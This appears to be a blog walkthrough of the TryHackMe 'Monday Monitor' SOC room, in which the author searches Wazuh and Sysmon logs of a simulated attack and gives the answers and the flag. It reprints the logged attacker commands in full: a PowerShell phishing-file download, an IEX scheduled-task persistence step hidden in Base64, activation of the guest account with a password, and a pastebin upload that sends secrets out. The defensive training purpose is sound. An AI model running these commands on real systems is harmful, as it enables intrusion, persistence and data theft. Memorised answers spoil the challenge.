Jasper Alblas

 

TryHackMe: Monday Monitor Walkthrough (SOC Level 1)

Welcome to this walkthrough of the Monday Monitor Room on TryHackMe. Swiftspend Finance, the coolest fintech company in town, is on a mission to level up its cyber security game to keep those digital adversaries at bay and ensure their customers stay safe and sound. Are you ready to test Swiftspend’s endpoint monitoring?

Monday Monitor Banner
Monday Monitor Banner

Room URL:
https://tryhackme.com/room/mondaymonitor

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Task 1: Navigate Through the Endpoint Logs

Scenario

Swiftspend Finance, the coolest fintech company in town, is on a mission to level up its cyber security game to keep those digital adversaries at bay and ensure their customers stay safe and sound.

Led by the tech-savvy Senior Security Engineer John Sterling, Swiftspend’s latest project is about beefing up their endpoint monitoring using Wazuh and Sysmon. They’ve been running some tests to see how well their cyber guardians can sniff out trouble. And guess what? You’re the cyber sleuth they’ve called in to crack the code!

The tests were run on Apr 29, 2024, between 12:00:00 and 20:00:00. As you dive into the logs, you’ll look for any suspicious process shenanigans or weird network connections, you name it! Your mission? Unravel the mysteries within the logs and dish out some epic insights to fine-tune Swiftspend’s defences.

Questions

Click the Start Machine button attached to this task to start the VM. Give the machine about 5 minutes to fully set up the environment. Access the Wazuh Dashboard using your browser at https://10-10-77-225.p.thmlabs.com and use the credentials listed in the room.

Once logged in, navigate to the Security events module and use the saved query Monday_Monitor to access the logs.

Initial access was established using a downloaded file. What is the file name saved on the host?

Go to Security Events underneath Modules in the menu.

And BTW, I was very confused seeing Wazuh like this, as we looked at a more modern version in the previous module.

Load the Monday_Monitor file by pressing the Load Button:

Make sure you filter the date on Apr 29, 2024, between 12:00:00 and 20:00:00. You can do this on the top-right side.

So, we got a bunch of events. But we need to find a needle in a haystack. Now, we didn’t really learn this in any rooms so far, as we didn’t cover Elastic/Kibana yet. But we know that the question mentions a downloaded file. This means we can filter on HTTP, just as we would do in for example Wireshark. We find 3 events, but one of them contains equals suspicious event:

Wazuh downloaded file event
Wazuh downloaded file event

The event data is here:

{
  "agent": {
    "ip": "10.10.205.57",
    "name": "Windows_SwiftSpend2",
    "id": "003"
  },
  "manager": {
    "name": "ip-10-10-40-198"
  },
  "data": {
    "win": {
      "eventdata": {
        "originalFileName": "PowerShell.EXE",
        "image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe",
        "product": "Microsoft® Windows® Operating System",
        "parentProcessGuid": "{00000000-0000-0000-0000-000000000000}",
        "description": "Windows PowerShell",
        "logonGuid": "{c5d2b969-8a47-662f-8b54-0a0000000000}",
        "processGuid": "{c5d2b969-a6d7-662f-3402-000000002201}",
        "logonId": "0xa548b",
        "parentProcessId": "2980",
        "processId": "6088",
        "currentDirectory": "C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\",
        "utcTime": "2024-04-29 13:55:35.417",
        "hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
        "company": "Microsoft Corporation",
        "commandLine": "\\\"powershell.exe\\\" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\\\SwiftSpend_Financial_Expenses.xlsm}",
        "integrityLevel": "High",
        "fileVersion": "10.0.17763.1 (WinBuild.160101.0800)",
        "user": "ATOMIC\\\\Administrator",
        "terminalSessionId": "2"
      },
      "system": {
        "eventID": "1",
        "keywords": "0x8000000000000000",
        "providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "level": "4",
        "channel": "Microsoft-Windows-Sysmon/Operational",
        "opcode": "0",
        "message": "\"Process Create:\r\nRuleName: -\r\nUtcTime: 2024-04-29 13:55:35.417\r\nProcessGuid: {c5d2b969-a6d7-662f-3402-000000002201}\r\nProcessId: 6088\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.17763.1 (WinBuild.160101.0800)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" & {$url = 'http://localhost/PhishingAttachment.xlsm'\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\SwiftSpend_Financial_Expenses.xlsm}\r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\\r\nUser: ATOMIC\\Administrator\r\nLogonGuid: {c5d2b969-8a47-662f-8b54-0a0000000000}\r\nLogonId: 0xA548B\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F\r\nParentProcessGuid: {00000000-0000-0000-0000-000000000000}\r\nParentProcessId: 2980\r\nParentImage: -\r\nParentCommandLine: -\r\nParentUser: -\"",
        "version": "5",
        "systemTime": "2024-04-29T13:55:35.420054500Z",
        "eventRecordID": "5716",
        "threadID": "1760",
        "computer": "ATOMIC",
        "task": "1",
        "processID": "3492",
        "severityValue": "INFORMATION",
        "providerName": "Microsoft-Windows-Sysmon"
      }
    }
  },
  "rule": {
    "firedtimes": 6,
    "mail": true,
    "level": 12,
    "description": "Detects suspicious file execution by wscript and cscript",
    "groups": [
      "sysmon",
      "sysmon_process-anomalies"
    ],
    "id": "255042"
  },
  "decoder": {
    "name": "windows_eventchannel"
  },
  "full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2024-04-29T13:55:35.420054500Z\",\"eventRecordID\":\"5716\",\"processID\":\"3492\",\"threadID\":\"1760\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"ATOMIC\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: -\\r\\nUtcTime: 2024-04-29 13:55:35.417\\r\\nProcessGuid: {c5d2b969-a6d7-662f-3402-000000002201}\\r\\nProcessId: 6088\\r\\nImage: C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\nFileVersion: 10.0.17763.1 (WinBuild.160101.0800)\\r\\nDescription: Windows PowerShell\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: PowerShell.EXE\\r\\nCommandLine: \\\"powershell.exe\\\" & {$url = 'http://localhost/PhishingAttachment.xlsm'\\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\\\SwiftSpend_Financial_Expenses.xlsm}\\r\\nCurrentDirectory: C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\\\r\\nUser: ATOMIC\\\\Administrator\\r\\nLogonGuid: {c5d2b969-8a47-662f-8b54-0a0000000000}\\r\\nLogonId: 0xA548B\\r\\nTerminalSessionId: 2\\r\\nIntegrityLevel: High\\r\\nHashes: MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F\\r\\nParentProcessGuid: {00000000-0000-0000-0000-000000000000}\\r\\nParentProcessId: 2980\\r\\nParentImage: -\\r\\nParentCommandLine: -\\r\\nParentUser: -\\\"\"},\"eventdata\":{\"utcTime\":\"2024-04-29 13:55:35.417\",\"processGuid\":\"{c5d2b969-a6d7-662f-3402-000000002201}\",\"processId\":\"6088\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\",\"fileVersion\":\"10.0.17763.1 (WinBuild.160101.0800)\",\"description\":\"Windows PowerShell\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"PowerShell.EXE\",\"commandLine\":\"\\\\\\\"powershell.exe\\\\\\\" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\\\\\\\SwiftSpend_Financial_Expenses.xlsm}\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\ADMINI~1\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\2\\\\\\\\\",\"user\":\"ATOMIC\\\\\\\\Administrator\",\"logonGuid\":\"{c5d2b969-8a47-662f-8b54-0a0000000000}\",\"logonId\":\"0xa548b\",\"terminalSessionId\":\"2\",\"integrityLevel\":\"High\",\"hashes\":\"MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F\",\"parentProcessGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"parentProcessId\":\"2980\"}}}",
  "input": {
    "type": "log"
  },
  "@timestamp": "2024-04-29T13:55:36.383Z",
  "location": "EventChannel",
  "id": "1714398936.2540312",
  "timestamp": "2024-04-29T13:55:36.383+0000",
  "_id": "TWUjKo8BB_AxyUDv1QrF"
}

This is a SYSMON Event with ID 1 (Event ID 1: Process Create):

    "task": "1",
    "processID": "3492",
    "severityValue": "INFORMATION",
    "providerName": "Microsoft-Windows-Sysmon"

Let’s look at the event in more details:

A process was started on a host named ATOMIC, running under the user ATOMIC\Administrator, using a PowerShell command. Here’s the specific command:

"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\SwiftSpend_Financial_Expenses.xlsm}

PowerShell was used to download a file, which is a common technique in phishing or malware delivery.

The file downloaded is named PhishingAttachment.xlsm, which strongly hints at a malicious macro-enabled Excel file.

The downloaded file is saved to the Temp folder with a legitimate-sounding name: SwiftSpend_Financial_Expenses.xlsm. This could be an attempt to trick users into opening it.

PS: If you have trouble finding the log entry you can filter on rule.id: 255042. It has the “Detects suspicious file execution by wscript and cscript” description. Anyway, the file which is saved on the host is an excel file called SwiftSpend_Financial_Expenses.xlsm.

Answer: SwiftSpend_Financial_Expenses.xlsm

What is the full command run to create a scheduled task?

Ok. Here is what I did. I filtered all events on Schtasks.exe by using the search bar in the top. This reduced the number of events to 4.

Have a look at the first or third event:

Task scheduler event
Task scheduler event

Here you can find something interesting for the field data.win.eventdata.parentCommandLine. Let’s break the whole event down:

 "data": {
    "win": {
      "eventdata": {
        "originalFileName": "schtasks.exe",
        "image": "C:\\\\Windows\\\\System32\\\\schtasks.exe",
        "product": "Microsoft® Windows® Operating System",
        "parentProcessGuid": "{c5d2b969-aada-662f-6a02-000000002201}",
        "description": "Task Scheduler Configuration Tool",
        "logonGuid": "{c5d2b969-8a47-662f-8b54-0a0000000000}",
        "parentCommandLine": "\\\"cmd.exe\\\" /c \\\"reg add HKCU\\\\SOFTWARE\\\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN \\\"ATOMIC-T1053.005\\\" /TR \\\"cmd /c start /min \\\\\\\"\\\\\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\\\\\SOFTWARE\\\\\\\\ATOMIC-T1053.005).test)))\\\" /sc daily /st 12:34\\\"",
        "processGuid": "{c5d2b969-aada-662f-6d02-000000002201}",
        "logonId": "0xa548b",
        "parentProcessId": "6520",
        "processId": "6280",
        "currentDirectory": "C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\",
        "utcTime": "2024-04-29 14:12:42.509",
        "hashes": "MD5=2F6CE97FAF2D5EEA919E4393BDD416A7,SHA256=4B679CCC4E0E84A9EDDC24362EA4A86835597A90D94A1AE0EA905D7BCD9F771C,IMPHASH=0BF09EE8918142EE8D325D5955AA1CD9",
        "parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
        "company": "Microsoft Corporation",
        "commandLine": "schtasks.exe  /Create /F /TN \\\"ATOMIC-T1053.005\\\" /TR \\\"cmd /c start /min \\\\\\\"\\\\\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\\\\\SOFTWARE\\\\\\\\ATOMIC-T1053.005).test)))\\\" /sc daily /st 12:34",
        "integrityLevel": "High",
        "fileVersion": "10.0.17763.1613 (WinBuild.160101.0800)",
        "user": "ATOMIC\\\\Administrator",
        "terminalSessionId": "2",
        "parentUser": "ATOMIC\\\\Administrator"
      },
      "system": {
        "eventID": "1",
        "keywords": "0x8000000000000000",
        "providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "level": "4",
        "channel": "Microsoft-Windows-Sysmon/Operational",
        "opcode": "0",
        "message": "\"Process Create:\r\nRuleName: -\r\nUtcTime: 2024-04-29 14:12:42.509\r\nProcessGuid: {c5d2b969-aada-662f-6d02-000000002201}\r\nProcessId: 6280\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.17763.1613 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: schtasks.exe  /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 12:34\r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\\r\nUser: ATOMIC\\Administrator\r\nLogonGuid: {c5d2b969-8a47-662f-8b54-0a0000000000}\r\nLogonId: 0xA548B\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: MD5=2F6CE97FAF2D5EEA919E4393BDD416A7,SHA256=4B679CCC4E0E84A9EDDC24362EA4A86835597A90D94A1AE0EA905D7BCD9F771C,IMPHASH=0BF09EE8918142EE8D325D5955AA1CD9\r\nParentProcessGuid: {c5d2b969-aada-662f-6a02-000000002201}\r\nParentProcessId: 6520\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"cmd.exe\" /c \"reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 12:34\"\r\nParentUser: ATOMIC\\Administrator\"",
        "version": "5",
        "systemTime": "2024-04-29T14:12:42.509969700Z",
        "eventRecordID": "5773",
        "threadID": "2032",
        "computer": "ATOMIC",
        "task": "1",
        "processID": "6760",
        "severityValue": "INFORMATION",
        "providerName": "Microsoft-Windows-Sysmon"
      }
    }
  },

This is also a Windows Sysmon Event ID 1: Process Create, which logs the creation of a process, specifically a suspicious use of cmd.exe and schtasks.exe to set up a daily scheduled task that executes a PowerShell command stored in the Windows registry as Base64-encoded PowerShell.

How I know it is a Sysmon Event ID 1? Because if you look at the event data you can see this:

<Provider Name="Microsoft-Windows-Sysmon" />
<EventID>1</EventID>

Step-by-step

Parent Process:
Powershell.exe is run with -ExecutionPolicy Bypass, allowing it to execute scripts without restrictions.

Child Process (Observed Event):

  • cmd.exe is launched.
  • It runs two commands combined with &:
    1. Adds a registry key: add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f
      This creates a registry value called test under HKCU\SOFTWARE\ATOMIC-T1053.005 with Base64 data:
      cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=, which decodes to: ping www.youarevulnerable.thm
    2. Creates a scheduled task: schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min "" powershell.exe -Command IEX(...)" /sc daily /st 12:34
      This sets a scheduled task that runs daily at 12:34.
      The task runs a minimized PowerShell command, which:
      – Reads the registry value
      – Decodes it from Base64.
      – Uses IEX (Invoke-Expression) to execute the decoded command: IEX([System.Text.Encoding]::ASCII.GetString( [System.Convert]::FromBase64String( (Get-ItemProperty -Path HKCU:\SOFTWARE\ATOMIC-T1053.005).test ) ))
      Effectively: ping www.youarevulnerable.thm

This is suspicious because:

  • Technique: This mimics the MITRE ATT&CK technique T1053.005 – Scheduled Task/Job: Scheduled Task.
  • Persistence: The scheduled task allows persistent execution even after reboot.
  • Obfuscation: Using the registry to store and Base64-encode the payload hides the true intent from casual inspection.
  • Command: Although the decoded command here is a harmless ping, this is often used in Red Team testing or malware to simulate beaconing to a command-and-control server.

Anyway, the answer is found in the data.win.eventdata.parentCommandLine field.

Answer: “cmd.exe” /c “reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN “ATOMIC-T1053.005” /TR “cmd /c start /min \”\” powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))” /sc daily /st 12:34″

What time is the scheduled task meant to run?

Let’s look at the command again, and you might have noticed the /sc flag, which is used to set the schedule. In this case the task is ran daily, at 12:34.

Answer: 12:34

What was encoded?

I covered this before. The base64 string (cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=) saved in the registry decodes to ping www.youarevulnerable.thm.

Answer: ping www.youarevulnerable.thm

What password was set for the new user account?

I started googling around to see which Event IDs were relevant here. This lead me to eventID 4738.

Here I found two events related to the Guest Account. The events (for good reason) do not mention a password though. So I removed the filter, and started looking around the timestamp during which these two events triggered, so that I can find other relevant events.

Directly before the first of these events we see the following event:

Here the guest account is being activated:

net1 user guest /active:yes

Before moving on, I would recommend to add the data.win.eventdata.commandLine field to the table view. This makes it much easier to see what is going on! Immediately it gets clear that suspicious stuff is going on:

Suspicious events
Suspicious events

In addition, to events adding the Guest account to the Administrators group (bad idea!), there are also two events which change the guest account pasword using net.exe:

net.exe\" user guest I_AM_M0NIT0R1NG

net1 user guest I_AM_M0NIT0R1NG

Answer: I_AM_M0NIT0R1NG

What is the name of the .exe that was used to dump credentials?

Scroll roughly 10-11 events down and you will come across some relevant events:

Dumping credentials
Dumping credentials

These commands appears to be two different commands of credential dumping and are part of an Atomic Red Team technique (T1003.001), which is a simulated attack procedure for dumping credentials from a Windows machine, particularly from the LSASS (Local Security Authority Subsystem Service) process.

Anyway, the answer is memotech.exe.

Answer: memotech.exe

Data was exfiltrated from the host. What was the flag that was part of the data?

Keep scrolling down and you will come across the data exfiltration part:

Powershell command with flag
Powershell command with flag
\"powershell.exe\" & {$apiKey = \\\"\"6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0\\\"\" $content = \\\"\"secrets, api keys, passwords, THM{M0N1T0R_1$_1N_3FF3CT}, confidential, private, wall, redeem...\\\"\" $url = \\\"\"https://pastebin.com/api/api_post.php\\\"\" $postData = @{   api_dev_key   = $apiKey   api_option    = \\\"\"paste\\\"\"   api_paste_code = $content } $response = Invoke-RestMethod -Uri $url -Method Post -Body $postData Write-Host \\\"\"Your paste URL: $response\\\"\"}

Here you can see a REST call getting made, which includes a flag in its content.

Answer: THM{M0N1T0R_1$_1N_3FF3CT}

Congratulations on completing Monday Monitor!!!

Congratulations on completing Monday Monitor
Congratulations on completing Monday Monitor

Congratulations on completing Monday Monitor. Uff, I honestly thought this wasa tough one! The previous Wazuh room did not completely prepare us for this question, and I felt like I was unsure if I was following the most efficient route to the answers. I would love to discuss this room with others, so please leave comments!

Come back soon for more walkthroughs of rooms on TryHackMe and HackTheBox, and other Cybersecurity discussions.

Find my other walkthroughs here.

Like my articles?

You are welcome to comment on this post, or share my post with friends.I would be even more grateful if you support me by buying me a cup of coffee:

Buy me a coffee
Buy me a coffee

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg

Tags

Newsletter Updates

Enter your email address below and subscribe to our newsletter

Related Posts

Trending now

TShark logo
TryHackMe: TShark Challenge 1: Teamwork Walkthrough (SOC Level 1) 
TShark logo
TryHackMe: TShark The Basics Walkthrough (SOC Level 1) 
TShark logo
TryHackMe: TShark Challenge 2: Directory Walkthrough (SOC Level 1) 
Endpoint Security Logo
TryHackMe: Intro to Endpoint Security Walkthrough (SOC Level 1)